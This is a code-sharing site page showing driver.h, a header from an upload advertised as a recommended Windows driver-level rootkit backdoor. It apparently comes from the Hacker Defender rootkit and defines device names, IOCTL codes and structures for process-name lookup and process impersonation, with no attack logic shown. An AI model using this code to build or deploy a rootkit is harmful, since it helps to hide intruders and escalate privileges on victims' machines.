📄 driver.h

📁 windows rootkit 驱动级的后门! 绝对推荐!

💻 H

字号:

#define IOCTL_GET_NAME_STRING \
  CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_IMPERSONATE_PROCESS \
  CTL_CODE(FILE_DEVICE_UNKNOWN, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS)

#define NT_DEVICE_NAME          L"\\Device\\HxDefDriver"
#define DOS_DEVICE_NAME         L"\\DosDevices\\HxDefDriver"
#define DEVICE_NAME		L"\\\\.\\HxDefDriver"

typedef struct 
{
  ULONG pid;
  HANDLE hwnd;
} DIB_NAME_STRING;

typedef struct 
{
  ULONG TargetProcess;
  ULONG SystemProcess;
} DIB_IMPERSONATE_PROCESS;

typedef struct 
{
  ULONG status;
} DOB_UNKNOWN;

typedef struct 
{
  ULONG status;
  ANSI_STRING name;
} DOB_NAME_STRING;

typedef struct 
{
  ULONG status;
} DOB_IMPERSONATE_PROCESS;

💿 文件大小 92 K

👤 上传用户 bbbbbb110

📂 所属分类驱动编程

🏷️ 相关标签

#windows #rootkit #驱动级

⌨️ 快捷键说明

复制代码 Ctrl + C

搜索代码 Ctrl + F

全屏模式 F11

切换主题 Ctrl + Shift + D

显示快捷键 ?

增大字号 Ctrl + =

减小字号 Ctrl + -